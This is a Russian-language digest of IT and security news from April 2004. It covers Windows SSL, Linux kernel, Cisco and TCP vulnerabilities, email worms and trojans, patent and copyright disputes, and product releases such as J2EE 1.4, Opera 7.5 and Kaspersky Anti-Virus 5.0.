Колосс программного обеспечения Microsoft озабочено распространением в сети эксплоита использующего брешь в Windows 2000 и XP машинах. Эксплоит "SSL Bomb" использует уязвимость, о которой было объявлено на прошлой неделе. Баг присутствует в Windows SSL (secure socket layer) протоколе и оставляет сервера открытыми для DoS атаки. Специально созданный SSL пакет может превести к тому что системы на базе Windows 2000 и Windows XP перестанут обслуживать SSL соединения, а на Windows Server 2003 машинах это вызовет перезагрузку. "Microsoft рассматривает эти сообщения [о расспространении эксплоита] правдоподобными и серьезными и продолжает настаивать на том, чтобы все пользователи немедленно установили MS04-011 (патч закрывающий SSL уязвимость), также как и остальные "критические" обновления, выпущенные на прошлой неделе". "Эксплоит работает на платформах, где запущен IIS (Internet Information Services) с поддержкой SSL аутентификации. Эксплоит пытается воспользоваться PCT/SSL уязвимостью, которые описаны в бюлетене MS04-011. Windows 2000 и Windows NT 4.0 в первую очередь подвержены опасности. На Windows Server 2003 даже с запущенным IIS и SSL, язвимый код отключен по умолчанию. Windows Server 2003 становится уязвимым только если администратор включит PCT вручную. Пользователи, усстановившие MS04-011 не подвержены атаке этого эксплоита", сообщили в Microsoft.
INQUIRER

26/04/2004 13:37 Анти-вирусное ПО встроено в Enterprise Java
SUN и SOPHOS, известная антивирусная фирма, разработали способ как встроить анти-вирусное ПО в Sun-овскую Java Enterprise System. Согласно сообщению Sophos, его продукт под названием 'PureMessage' интегрирован с Java System Messaging Server и составляет интегрированную систему которая сможет защищать от спама, вирусов и других угроз безопасности. Это значит, что Java Enterprise System может напрямую взаимодействовать с PureMessage без дополнительных компонент, что значительно ускоряет процесс обработки сообщений. Представитель Sophos заверил, что новый продукт понравится потребителям своей высокой производительностью и хорошей защитой. Пресс-релиз от Sophos можно прочитать здесь.
INQUIRER

26/04/2004 13:20 Письма, сообщающие о поимке Бен-Ладена, содержат троян
'Osama Captured' такой заголовок имеет письмо содержащее троян. Новый троян 'Trj/Small.B' распространяется по электронной почте с 23 апреля. Письмо сообщает что содержит линк на новость на CNN или BBC рассказывающую о поимке террориста №1 Осамы Бен-Ладена. ПК пользователей, кликнувших на линк, заражаются трояном, использующим известную уязвимость в Microsoft's Internet Explorer (IE). Только пользователи непропатченных версий IE подвержены риску. Ресурсы зараженной машины становятся доступны хакерам или спамерам. Это последний пример когда злоумышленники пытаются применить "социальную инженерию" для распространения своей вредоносной программы заставляя жертвы открывать зараженные аттачменты или кликать на линки.
Internet News

26/04/2004 13:18 IBM спасет малый бизнес от вирусов и спама
Корпорация IBM представила новый пакет услуг по удаленному обслуживанию компьютерной техники на предприятиях малого и среднего бизнеса. Пакет услуг под названием Desktop Management Services предполагает удаленное администрирование рабочих мест пользователей посредством интернета, регулярное сканирование на вирусы, установку обновлений к программному обеспечению, борьбу со спамом. Для работы системы обновления в сети заказчика будет устанавливаться специальный сервер, осуществляющий мониторинг состояния сети, сканирование на вирусы, установку всех необходимых программ и обновлений к ним и т.д. Кроме того, специалисты IBM в удаленном режиме будут предоставлять удаленные консультации. В IBM отмечают, что переход к централизованному управлению рабочими местами имеет целый ряд преимуществ по сравнению с администрированием каждого компьютера в отдельности. По расчетам IBM, экономия средств в этом случае может составить до 30%.
compulenta.ru

26/04/2004 13:10 Американские суды распугали 17 миллионов пользователей файлообменных сетей
С ноября прошлого года более 17 миллионов американцев или около 14 процентов совершеннолетних интернет-пользователей отказались от скачивания музыкальных файлов из всемирной компьютерной сети. К таким выводам пришли исследователи из компании Pew Internet and American Life Project, сообщает Associated Press.
Треть бывших интернет-меломанов - около 6 миллионов человек - сообщила, что отказалась от музыкальных сетевых архивов в связи с открытием более 1000 судебных процессов в области нарушения авторских прав. При этом многие из этих процессов закончились вынесением постановлений о выплате штрафов в несколько тысяч долларов. С учетом действующего американского законодательства, одна нелегально скачанная песня может обойтись пользователю в 150 тысяч долларов.
lenta.ru

25/04/2004 01:28 Apache добавляет XML шифрование в Java библиотеку
Apache Foundation анонсировала релиз-версию 1.1 Java библиотеки, которая включает бета-реализацию XML шифрования.
Группа интузиастов под названием XML Security Project в рамках проекта Apache разработала реализацию W3C стандарта безопасности в XML. Этот последний бета-релиз библиотеки включает реализацию встраиваемых алгоритмов и поддержку для шифрации\дешифрации XML-сообщений. Релиз также включает исправления багов в предыдущей реализации Digital Signature в Java библиотеки. В XML Security Project доступна C++ библиотека. Более подробно о этом релизе можно узнать в группе XML Security Project of the Apache Foundation.
Web Services Pipeline

25/04/2004 01:14 На следующей неделе появится новая спецификация J2EE 1.4
Sun Microsystems и другие основные разработчики Java ПО планируют объявить о новом релизе J2EE 1.4 в понедельник в СанФранциско. Sun, BEA Systems, IBM, Oracle, JBoss и некоторые другие компании в понедельник примут участие в обсуждении важности совместимости J2EE 1.4 и новых технологий, описываемых в спецификации. Ожидается что некоторые компании аннонсируют выход савоих серверов приложений, совместимых с J2EE 1.4 к концу этого года. Oracle и Sun уже начали продавать свои продукты совместимые с J2EE 1.4.
Источник

25/04/2004 01:14 Компания Forgent судится за право использовать JPEG
22 апреля Forgent Networks Inc. подала иск на 31 компанию за нарушение прав по патенту на технологию сжатия данных, используемую в JPEG стандарте для цифровых изображений. Среди них такие компании как Apple Computer Inc., Dell Inc., Eastman Kodak Co., Hewlett-Packard Co., IBM, Macromedia Inc. и Xerox Corp. На все эти компании Forgent подала в суд после того, как с ними не удалось заключить лицензионное соглашение, как например с Sony Corp., сказал Michael Noonan, директор по связям компании Forgent. JPEG файлы широко используются в пограммном обеспечении и оборудовании. Процедура сжатия данных, использующаяся в JPEG похожа на метод, запатентованный фирмой Forgent. В 2002 году, Forgent анонсировала что она обладает патентом и планирует разработать лицензионное соглашение для всех компаний использующих сжатие изображений. Независимая группа JPEG (The Independent JPEG Group - IJG) заявила в 2002 году что патент Forgent относится к другому методу сжатия нежели стандарт JPEG. Однако, Sony заплатила Forgent $16 млн за лицензирование технологии. Forgent заключила лицензионнное соглашение еще с 30 компаниями и получила около $90 млн. Компания Microsoft не включена в список компаний на которые подан иск, не смотря на то что Windows ОС и Internet Explorer также используют JPEG технологию. Forgent ведет переговоры о лицензировании с ней, но пока соглашение не достигнуто, сказал Michael Noonan.
Источник

25/04/2004 01:13 Spamhaus и правительство Китая борятся со спамом
Правительство Китая пригласило анти-спам организацию Spamhaus помочь обуздать поток спама сыплющийся на китаские системы. Спам становится огромной проблемой для Китайских провайдеров интернет услуг т.к. растущее число спамеров используют веб-сайты, расположенные в Китае. Spamhaus зазвернула версию своего веб-сайта на китайском языке и использует китайцев, кто хочет добровольно помочь, для мониторинга спама. Используя передовые анти-спам технологии и демонстрируя значимость проблемы Spamhaus надеется "убедить китайские власти разработать эффективное законодательство и технологии против спама".
Источник

25/04/2004 01:12 iDEFENSE сообщила о уязвимости в ядре Linux
Американская фирма, занимающаяся вопросами безопасности, iDefense распространила предупреждение о уязвимости по переполнению буфера в некоторых версиях ядра Linux (Linux Kernel 2.6.x, 2.5.x и 2.4.x). iDefense разработала эксплоит, который позволяет локальному пользователю получить привилегии root и выполнить код с привилегиями ядра. "Уязвимость обнаружевается при выполнении просмотра директории на специально созданной злоумышленником ISO - файловой системе, или при попытки получить доступ к файлу через специально сделанный сим-линк (symlink) в подобной файловой системе." Производители, включая SuSE Security, Debian и Mandrake Linux, расспространили свои коментарии и\или патчи решающие эту проблему.
Источник

25/04/2004 01:08 Вышла заплатка закрывающая уязвимость в ColdFusion MX
Macromedia расспространила предупреждение класса "important" о найденной уязвимости во всех редакциях ColdFusion MX 6.1 и всех версиях ColdFusion MX 6.1 J2EE. Уязвимость позволяет провести DoS (denial of service) атаку. В сообщении говорится: "При загрузке файла в ColdFusion MX через HTML форму, если загрузка была начата но затем прервана - свободное место на диске сервера не восстанавливается." Заплатка, решающая эту проблему, доступна для скачивания. Это последний из серии инцидентов с безопасностью продуктов Macromedia. В марте 2004 компания распространяла серию патчей закрывающих различные уязвимости в продуктах линейки Macromedia MX 2004.
Источник

25/04/2004 01:06 Yahoo исправила уязвимость в почтовом веб-интерфейсе
Yahoo! закрыла дыру в своем почтовом веб-сервисе, которая позволяла атакующему получить доступ к почтовому ящику и персональной информации пользователя. Уязвимость, которая была обнаружена Drew Copley специалистом компании eEye Digital Security, позволяла атакующему "обойти Javascript фильтры" используя сообщение длинной более 100kb. Уязвимость позволяла перхватить log-in пользователя и информацию, содержащуюся в куках. Mr. Copley похвалил Yahoo! за их профессионализм и скорость с которой они правились с проблемой.
Источник

25/04/2004 01:05 Network Associates переименовывается в McAfee
Network Associates, компания занимающаяся разработкой продуктов в области безопасноти, формально известная как McAfee, решила поменять назад свое название. В четверг Network Associates сообщила о продаже линейки продуктов под названием Sniffer network analyzer компаниям Silver Lake Partners и Texas Pacific Group за $275 млн. После совершения сделки покупатели создадут новую компанию под названием Network General для продвижения линейки сниферов на рынок, а сама Network Associates превратится в McAfee. Если кто-то помнит, в 1998 году, компания под названием Network General объединилась с McAfee и организовала Network Associates. Новая McAfee будет включать в себя отделы занимающиеся антивирусом, безопасностью бизнеса и лабораторию исследований. Также Network Associates анонсировала снижение цен на свои продукты.
Network Associates

24/04/2004 14:21 Microsoft наказывает российских пиратов
19 марта и 1 апреля нынешнего года мировые судьи Октябрьского района города Самары вынесли решения в отношении компании ООО "Мегател", занимающейся продажей услуг и оборудования сотовой связи. Согласно постановлениям суда, ООО "Мегател" придется выплатить в пользу государства два штрафа в размере 30 тысяч рублей каждый за использование пиратских копий программных продуктов Microsoft.
Compulenta

24/04/2004 14:15 Бета-версия браузера Opera 7.5
Норвежская компания Opera Software выпустила первую бета-версию браузера Opera 7.5. До этого компания выпускала несколько предварительных версий данной программы, а теперь дело, наконец, дошло до официальной беты. Примечательно, что Opera 7.5 beta 1 одновременно вышла в версиях для всех поддерживаемых компанией платформ - Windows, Linux, FreeBSD, Mac OS и Solaris.
Compulenta

24/04/2004 14:14 Разработана Windows для Linux
Филиппинская компания сообщила что она разработала способ запускать любые программы на Linux машинах. SpecOps Labs утверждает что установив ее програмное обеспечение на своей Linux машине, вы получите машину с Windows OS - только более надежную. Программа поступит в продажу к концу года. Цена программного продукта, который получил название "David", пока не разглашается, но утверждается что она будет существенно ниже чем Windows.
Источник

24/04/2004 14:12 Уязвимость TCP: exploit найден, но риск не велик
22 апреля Symantec, подтвердила существование рабочего эксплоита уязвимости в TCP, которая позволяет провести атаку на роутеры и другое оборудование управляющее сетевым траффиком. Брешь в протоколе изначально была обнаружена исследователем Paul Watson, и государственные структуры США и Англии распространили соответствующее предупреждение на прошой неделе. Это сообщение всколыхнуло интернет-общественность. Практически каждое издание опубликовало материалы и мнения аналитиков. Но в основном все эксперты сходятся во мнении: риск, что распространенный эксплоит нанесет серьезный ущерб, невелик, т.к. большинство провайдеров уже оповещены и предприняли необходимые действия.
Источник 1
Источник 2

24/04/2004 14:11 Самые разные вирусы могут распространяться по электронной почте
К такому выводу приводит обзор предупреждений различных антивирусных компаний за последнюю неделю, сделанный электронным изданием esecurityplanet. Panda Software 21 апреля опубликовала предупреждение о черве Mydoom.J, который распространяется по электронной почте и по файлообменным сетям. Sophos обнаружила W32/Agobot-QF IRC backdoor троян и почтовый червь. Он распространяется по электронной почте, напрямую используя SMTP и открывает инфицированную машину для удаленного доступа. Другие антивирусные компании сообщали о W32/Blaster.G worm, W32.Opasa@mm worm, W32/Blaster.worm.k!backdoor - троянах, открывающих удаленный доступ, и о Worm_Mimail.V резидентном черве.
Источник

24/04/2004 14:10 Новая модификация почтового червя Netsky - Netsky-Z
Антивирсная фирма Sophos обнаружила новую разновидность почтового червя Netsky - Netsky.Z, и предупредила пользователей о необходимости обновления антивирусного ПО. Netsky.Z, как и предыдущие версии, распространяется по электронной почте в ZIP файле с именем 'Bill.zip', 'Important.zip' или 'Details.zip'. Заголовок письма содержит такую же фразу, как и у пердыдущей версии вируса. Вирус запрограммирован так, что в первых числах мая он пердпримет DoS атаку на три образовательных веб-сайта (www.educ.ch, www.medinfo.ufl.edu and www.nibis.de). Netsky - первый вирус, иненование модификаций которого достигло конца английского алфавита.
Источник
Sophos

24/04/2004 14:09 В 11 странах прошла облава на сетевых пиратов
Минюст США совместно с правительствами 10 других стран провел крупнейшую операцию против сетевых пиратов. Как сообщил генпрокурор США Джон Эшкрофт, были изъяты более 200 компьютеров и найдены 100 человек, причастных к незаконному копированию музыки, фильмов и программного обеспечения на сумму в 50 миллионов долларов. В числе изъятых компьютеров оказались 30 серверов, на одном из которых хранилось более 65 тысяч наименований незаконной продукции.
Источник

24/04/2004 14:08 Яндекс и Mail.Ru вводят безлимитные почтовые ящики
В четверг две крупнейшие российские бесплатные почтовые интернет-службы - Mail.Ru и "Почта Яндекса" объявили о том, что они снимают со своих пользователей ограничения на размер электронного почтового ящика. Это первая подобная услуга в мировой практике. Отныне клиенты этих служб могут по мере наполнения своих ящиков увеличивать их объем до любого необходимого размера. Для этого нужно задействовать соответствующую функцию в настройках почтовой службы. Кроме того, в четверг стало известно о том, что почтовый ящик размером 1 гигабайт планирует бесплатно предоставлять пользователям израильский интернет-портал Walla. Как ранее сообщалось, первым о ближайшем запуске почтовой службы с размером ящика 1 гигабайт объявила 1 апреля американская поисковая служба Google. Позже о начале предоставления аналогичной услуги объявил американский интернет-портал Spymac.
Источник

23/04/2004 14:46 Законодатели ищут пути как закрыть Gmail
Сенаторы штата California посчитали Gmail "ужасающим" в проникновении в личные дела пользователей интернета и возбудили процесс по закрытию бесплатного почтового сервиса Google. Сенатор Liz Figueroa, демократ от Bay Area city of Fremont, сказала в четверг, что это незаконно, когда компания просматривает письма своих клиентов и показывает рекламу даже если клиент явно согласился на это в обмен на гигабайтный размер почтового ящика. Google встретил неожиданное сопротивление со стороны защитников закона аппелирующих к некоторым законодательным актам регулирующих деятельность частных компаний. В судебном иске против Google говорится что исходящие почтовые или IM сообщения могут быть просмотрены или отфильтрованы провайдером услуг, но входящие - нет, исключая узкий круг случаев фильтрации спама и вирусов. Представитель Google сказал что у него нет ответа прямо сейчас, они должны еще раз просмотреть законодательство. Figueroa надеется что у них получится приостановить открывающийся вскоре почтовый сервис Gmail, который пока еще не доступен широкой публике. В ее судебном иске говорится что ни e-mail сервисы, ни IM провайдеры не могут "просматривать, исследовать или оценивать входящие сообщения" созданные вне этого сервиса без явного разрешения всех кореспондентов данного пользователя; серьезное и фактически не выполнимое на практике требование. В офисе Figueroa согласились что в данном иске есть некоторые проблемы, но они надеятся что они будут решены в ходе совещаний с законодателями. Слушание дела состоится в Юридическом Комитете Сената до 4 Мая.
Источник

23/04/2004 13:56 Эксперты соообщают: Bluetooth по-прежнему имеет дыры в безопасности
Согласно сообщению исследователей, последняя спецификация Bluetooth, популярной беспроводной технологии, оставила открытыми несколько вопросов в безопасности. Проблема в Bluetooth 1.2 технологии связана с тем, как обрабатывается персональный идентификационный номер (PIN) который используется для защиты данных, сказал в среду на конференции посвященной этой проблеме Олие Вайтхаус (Ollie Whitehouse), исследователь фирмы @Stake, занимающейся цифровой безопасностью. Аналитики спецификации показали что при использовании специального оборудования идентификатор может быть сломан, что приведет к возможности перехвата информации, передающейся между двумя устройствами связанными между собой по Bluetooth. Это даст злоумышленнику доступ к прослушиванию телефонных звонков, получению персональной информации и даже позволит фальсифицировать сигнал передающийся от одного устройства к другому. Это последняя обнаруженная проблема в безопасности. Ранее сообщалось о других проблемах с Bluetooth: одна получила красочное название "Redfang" (красный клык) которая позволяла обнаружить скрытое Bluetooth-устройство, и вторая - "Bluestumbling" (другое название "Bluesnarfing"), которая позволяет атакующему получить информацию с телефонов имеющих плохую защиту. Nokia, один из производителей, чьи телефоны подвержены Bluestumbling, аннонсировала в четрерг обновление решающее эту проблему. Олие Вайтхаус сказал что вопросы безопасности относящасиеся к Bluetooth технологии находятся в плачевном состоянии. "Мы имеем три версии спецификации, но вопросы все еще не решены, хотя по всему миру распространено как минимум 40 млн устройств подерживающих Bluetooth 1.2 и более ранние версии. Я считаю что такая атака будет возможна по краеней мере в течении еще трех лет." @Stake рекомендует финансовым и другим кампаниям не пользоваться Bluetooth. К счастью, провести атаку используя брешь обнаруженную в среду не так-то просто и довольно дорого.
Источник

23/04/2004 12:46 Microsoft объединяет усилия по борьбе с педофилией в интернете
Microsoft, INTERPOL и The International Centre for Missing and Exploited Children объединили свои усилия по борьбе с детской порнографией в инернете и организовали Всеобщую Кампанию Против Детской Порнографии (Global Campaign Against Child Pornography).Новая кампания разработает программу и технолонии для отслеживания сайтов содержащих детскую порнографию или относящихся к педофилии. Шейла Джонсон (Sheila Johnson), представитель ICMEC, сказала, "Цель кампании - создать глобальную информационную сеть, помогающую правоохранительным органам и потерпевшим. Уже более 200 000 сообщений о сайтах с детской порнографией поступило в ICMEC."
INQUIRER
MIcrosoft PressPass

23/04/2004 12:45 Новые дыры в программах Symantec
Четыре новых критических бага были обнаружены в трех продуктах от Symantec: Norton Internet Security 2004, Norton Internet Security 2004 Professional, и Norton Personal Firewall 2004. eEye Digital Security, фирма занимающаяся безопасностью, обнаружила и сообщила об этих уязвимостях но не раскрыла детали до тех пор, пока Symantec не выпустит патчи. Три уязвимости позволяют удаленному взломщику получить полный доступ к машине на которой стоит уязвимое ПО. Четвертая уязвимость позволяет организовать удаленную DoS атаку. Symantec пока еще не выпустила патчи, хотя eEye сообщила о багах уже 44 дня назад.
Источник

22/04/2004 16:03 "Сервис-Лайн" (Москва) закрывает 25-й порт
По сообщению компании "Сервис-Лайн" (Москва), в связи с продолжением эпидемии почтовых вирусов, для физических лиц закрыта возможность отправки почты напрямую на внешние e-mail сервера (25-й порт tcp). Для отправки почты абонентам следует использовать SMTP-сервер компании, на котором установлен антивирус, и вся исходящая почта проверяется на наличие вирусов.
Источник

22/04/2004 15:30 Программа для защиты от файлообмена в Сети
Компания Palisade Systems сообщила о выпуске нового программного инструментария PacketHound 3.0, посредством которого, теоретически, можно предотвратить нелегальный файлообмен в Сети. Пакет PacketHound 3.0, основанный на технологиях фирмы Audible Magic, уже заинтересовал Американскую ассоциацию звукозаписывающих компаний, которая с сентября прошлого года ведет жестокую войну с пиринговыми службами в интернете, сообщает "Компьюлента". Принцип работы PacketHound 3.0 сводится к следующему. Фильтрующий агент устанавливается непосредственно в файлообменной сети, а не внутри клиентской программы для доступа к Р2Р-сервису. Причем PacketHound 3.0 следит не только за передаваемыми мультимедийными файлами, но и за всеми другими операциями, производимыми пользователями. К примеру, если инсталлировать PacketHound 3.0 на сервере университета, приложение будет просматривать электронную почту, сообщения, передаваемые посредством интернет-пейджеров, и т.д. В ходе фильтрации пакет разыскивает авторские цифровые метки и при обнаружении таковых запрещает все операции по передаче контента. Постоянно пополняющаяся база данных защищенных композиций в настоящее время насчитывает четыре миллиона произведений. Цена у ПО доольно нешуточная - "всего" 2290 у.е.
Подробности

22/04/2004 15:07 CBOSS разнообразит сигналы "занято"
Ассоциация CBOSS анонсировала новый продукт - CBOSSringBackTone, дающий возможность абонентам заменять стандартные сигналы вызова и сообщения о недоступности или занятости телефона. Система управления мелодиями вызова CBOSSringBackTone работает на базе сервера конвергентных телекоммуникационных приложений CBOSSin. Пользователь может установить собственные звуковые фрагменты, которые будут циклически проигрываться звонящим ему абонентам в случае его занятости или недоступности, а также мелодии, которые будут проигрываться ему самому при попытке дозвониться занятому или недоступному абоненту. Мелодии для замены стандартных сигналов и сообщений абонент сможет записать сам или выбрать на Web-странице компании-оператора, используя Internet-систему самообслуживания (в качестве такой системы может использоваться CBOSSics), аналогично мелодиям и заставкам на экране мобильного телефона. Предусмотрено управление фрагментами с мобильного телефона при помощи голосового меню (например, CBOSSacc), SMS и USSD. Как утверждают в компании, использование CBOSSringBackTone позволит создать платные сервисы по предоставлению доступа к коллекции голосовых фрагментов, увеличить голосовой трафик за счет услуг предварительного прослушивания фрагментов, а при интеграции с CBOSScallScreening - увеличить использование коллекции звуковых фрагментов в несколько раз.
Источник

22/04/2004 14:35 Еврокомиссия угрожает странам Европы судом за пристрастие к продукции Intel
Комиссия Евросоюза пришла к выводу, что власти ряда входящих в ЕС государств нарушили европейское законодательство, разместив заказы на микропороцессоры в фирме Intel и не предоставив возможности участвовать в соответствующих тендерах другим производителям. По информации лоднонской газеты Financial Times, с жалобой по этому поводу в Еврокомиссию обратилась компания Advanced Micro Devices (AMD), конкурент Intel. По утверждению ее представителей, европейские правительства и власти в регионах делают безальтернативный выбор в пользу продукции Intel, препятствуя таким образом свободной конкуренции в торговле, охраняемой европейским законодательством. В комиссии посчитали, что подобная практика является нарушением базовых принципов законодательства ЕС, в связи с чем Еврокомиссия намерена призвать правительства изменить методы проведения тендеров на закупку компьютерного оборудования. Соответствующие предупреждения уже направлены властям Германии и Италии. В противном случае комиссия ЕС намеревается обжаловать действия правительств в судебном порядке.
Источник

22/04/2004 14:20 Ученые обнаружили предел скорости передачи компьютерных данных
Ученые обнаружили предел скорости для передачи компьютерных данных, сообщает Associated Press. При этом специалисты отмечают, что предел в 1000 раз превышает скорости, существующие в самых современных устройствах хранения данных. Информация на дисках хранится в виде последовательности мест с переменной намагниченностью, соответствующей нулю или единице. Перезапись данных подразумевает посыл на диск электромагнитного импульса, который меняет направление намагниченности каждого бита. С увеличением частоты импульсов сокращается время, необходимое для сохранения или перезаписи информации. Однако, если импульсы будут идти слишком часто, их высокая энергия может вызвать хаотическое изменение направления намагниченности и приведет к сбою стабильной работы системы, считают ученые. Для подтверждения своих выводов специалисты использовали ускоритель элементарных частиц Стэнфордского университета, с помощью которого они бомдардировали образец магнитного материала для изготовления накопителей. Скорость импульсов энергии при этом почти достигала скорости света, а их длительность составляла всего 2,3 пикосекунды. При таких показателях намагниченность образца материала принимала хаотичный характер, что совершенно неприемлемо для сохранения данных.
Подробности

22/04/2004 13:22 Секс-спам будет маркироваться!
С 19 мая спам, содержащий сексуальную информацию должен иметь специальную пометку, такой закон приняля недавно Федеральная Торговая Коммисия США (Federal Trade Commission). Новый закон предписывает спамерам во все письма содержащие сексуальную информацию включать специальную фразу "sexually explicit" в заголовок и\или тему письма а также запрещает включать картинки в тело сообщения. Это должно исключить ту ситуацию, когда пользователь не догадывается что он увидит, когда откроет полученное письмо, говорится в комментариях к закону. Согласно исследованию, проведенному федеральной Торговой Комиссией, 17 процентов порнографического спама содержит картинки обнаженных людей(!). Закон должен улучшить работу почтовых фильтров, препятствующих получению нежелаемой кореспонденции. Тем не менее, как показывает практика борьбы с "чумой начала 21 века" (коей, вне всякого сомнения, является спам), спамеры наверняка очень скоро найдут способ обходить всевозможные фильтры. Впрочем, развернувшаяся война с ними именно с юридической платформы, развёрнутая во многих странах, - обнадёживает.
По материалам Inquirer
Закон федеральной Торговой Комиссии США

22/04/2004 13:19 Уязвимость в Cisco IOS позволяет провести DoS-атаку
Еще одна уязвимость Cisco IOS (не связанная с уязвимостью в протоколе TCP) была обнаружена и опубликована US-CERT. Уязвимость присутствует в SNMP-сервисе некоторых версий Cisco IOS и позволяет удаленному атакующему осуществить DoS-атаку на оборудование. Посылая специально созданный SNMP запрос уязвимой системе, атакующий может вызвать ее постоянную перезагрузку, создав тем самым условия для атаки на "отказ в обслуживании" (DoS). Согласно сообщеню на сайте Cisco, этой уязвимости подвержены только некоторые версии Cisco IOS, такие как 12.0S, 12.1E, 12.2, 12.2S, 12.3, 12.3B and 12.3T. "Несколько факторов делают SNMP уязвимость реально опасной", сказал Amit Yoran, директор National Cyber Security Division of the DHS, на конференции посвященной этой проблеме. "Прежде всего это широкое распространение по всему миру продуктов Cisco, имеющих данную уязвимость а также то, что относительно легко можно ею воспользоваться. Даже начинающий программист сможет атаковать и вывести из строя роутер", сказал Amit Yoran.
Источники ComputerWorld и Cisco

22/04/2004 13:15 Cisco выпустила обновление своего ПО
Cisco опубликовала патч, закрывающий брешь в ее продуктах, вызванную обнаруженной недавно уязвимостью в TCP-протоколе. После того как в во вторник NISCC распространил предупреждение с описанием обнаруженной проблемы, Cisco и некоторые другие производители оборудования подтвердили что их продукты могут быть подвержены этой уязвимости. Cisco разместила на своем сайте информацию для клиентов, призывающую обновить программное обеспечение. Как говорится в сообщени, эта проблема касается многих продуктов Cisco, в том числе IP-роутеров, Ethernet switches, телефонного оборудования и т.д. Другие производители оборудования, такие как Juniper Networks и Check Point Software Technologies, также опубликовали предупреждение и информацию о необходимости обновления ПО на своих веб-сайтах.
Источник

21/04/2004 17:59 Cisco отводит угрозу от EAP
Компания Cisco выпустила безопасный протокол идентификации для защиты сетей 802.1X Extensible Authentication Protocol (EAP) от атак, при которых активно используется словарь – для взлома перебирается множество вариантов паролей, в том числе «популярных» у пользователей, например, таких, как имена людей и географические названия. Компания Cisco признала, что ее алгоритм идентификации EAP на базе паролей, также известный как Leap, уязвим для подобного рода атак, как, впрочем, и многие другие системы. Исходный код инструмента для проведения «словарных» атак «Asleep» был опубликован в начале апреля, что могло позволить хакерам запустить онлайновый штурм на системы идентификации, в которых используется Microsoft MS-Chap. Cisco опубликовала новый протокол безопасности EAP-Flexible Authentication via Secure Tunneling (EAP-FAST), который предназначен для эксплуатации с системами Cisco Leap, использующими протокол идентификации MS-Chap. В официальном заявлении Cisco говорится, что компания «разработала EAP-FAST для пользователей, которые в будущем предполагают реализовать системы 802.1X EAP. Такие устройства, с одной стороны, не требуют никаких цифровых сертификатов для идентификации, а, с другой, – остаются неуязвимыми для атак с перебором возможных паролей.
Источник

21/04/2004 17:17 Internet2: поставлен новый рекорд скорости
Исследователи из Калифорнийского технологического института и женевского CERN провели очередной успешный опыт по сверхскоростной передаче данных. По информации журнала PCWorld.com, опыт проводился на базе экспериментальной сети Abilene Network, являющейся «хребтом» академической сети Internet2. В ходе эксперимента по передаче данных на расстояние 11000 километров, ученым удалось достичь средней скорости 6,25 гигабит в секунду. Это примерно в сто тысяч раз быстрее той скорости, которую способен развить хороший модем, поддерживающий протокол v.90. Таким образом, объединенной команде Калифорнийского технологического и CERN удалось побить свой собственный рекорд, поставленный в прошлом году, когда ученые добились средней скорости около четырех гигабит в секунду. Любопытно, что в тот раз рекордный результат был достигнут благодаря использованию шестой версии интернет-протокола, а для достижения нынешнего рекорда исследователям хватило старого доброго IPv4, который уже совсем скоро будет списан на свалку истории.
Источник

21/04/2004 16:52 Выход GCC 3.4.0
Выход каждой новой версии компилятора GCC всегда является значимым событием. Как известно, ядра в открытых системах обычно собираются именно с использованием компилятора GCC, являющимся стандартом де-факто в этих ОС. На днях вышла новая стабильная версия этого компилятора - GCC 3.4.0. Проведено множество исправлений, нововведений и оптимизаций. Из языков программирования подвержены изменениям были Ada, C, C++, Objective-C, Java, Fortran, из архитектур — Alpha, ARM, H8/300, IA-32/AMD64 (x86-64), IA-64, M32R (появилась поддержка процессора M32R/2), M68000, MIPS (+поддержка RM7000 и RM9000), PowerPC Darwin, S/390 и zSeries (+поддержка z990), SPARC, SuperH (+поддержка SH2E), V850 (+поддержка Mitsubishi V850E1), Xtensa. Для собирания GCC теперь понадобится GNU Make; устранена поддержка опций -fvolatile, -fvolatile-global и -fvolatile-static; вместо теперь , сообщается на www.nixp.ru.
Изменения в новой версии

21/04/2004 16:30 Госдума исправляет закон об авторских правах
21 апреля депутаты Государственной думы РФ приняли во втором чтении законопроект о поправках в закон "Об авторском праве и смежных правах". Об этом сообщило сегодня информационное агентство "Итар-ТАСС". В законопроекте вводится право на доведение до всеобщего сведения, подразумеваемое так называемым интернет-правом, которое предоставляет правообладателю возможность регулировать использование произведений или объектов смежных прав в интернете. Ещё одна важная поправка, которая вносится в закон "Об авторском праве и смежных правах", заключается в продлении на двадцать лет срока действия авторского права. Теперь авторские права на произведение будут действовать не пятьдесят лет после смерти автора, а семьдесят. По истечении этого срока произведение становится общественным достоянием. Авторское право юридических лиц также продлено. Как утверждается, это позволит издательствам, государственным киностудиям и другим организациям обеспечивать охрану произведений и выплату авторам этих произведений гонораров. В законопроекте оговаривается использование специальных технических средств защиты авторских прав и введение правообладателем специальных кодов и технологий, предотвращающих использование произведений без их согласия.
Подробности

21/04/2004 15:46 Антивирус Касперского® 5.0: революционные технологии борьбы с вредоносными программами
"Лаборатория Касперского" сообщает о выпуске Антивируса Касперского® 5.0 - нового поколения антивирусных программ для операционной системы Windows. Представленная версия продукта органично сочетает уникальную функциональность, новый пользовательский интерфейс и ставший легендарным уровень защиты от вирусов. В совокупности эти характеристики еще раз подтверждают позиции Антивируса Касперского как самой надежной антивирусной программы и однозначно выводят продукт в лидеры в общей оценке потребительских качеств. В пятом поколении антивирусных систем "Лаборатории Касперского" практически решен главный недостаток современных антивирусов - снижение производительности компьютеров из-за необходимости фоновой проверки больших объемов данных. Благодаря интеграции уникальных технологий обработки файлов iChecker, iStream и iCache, Антивирус Касперского работает в среднем в три раза быстрее и требует в 2 раза меньше оперативной памяти, чем предыдущие версии, несмотря на возросший уровень защиты и расширение функциональности. В основе этих технологий лежит интеллектуальное ядро распознавания целостности файла и взаимодействия с кэш-менеджером операционной системы. Это позволяет избежать избыточного сканирования заведомо чистых файлов и максимально использовать ресурсы операционной системы для увеличения производительности антивируса.
Подробнее

21/04/2004 14:52 Уязвимость в TCP (transmission control protocol)
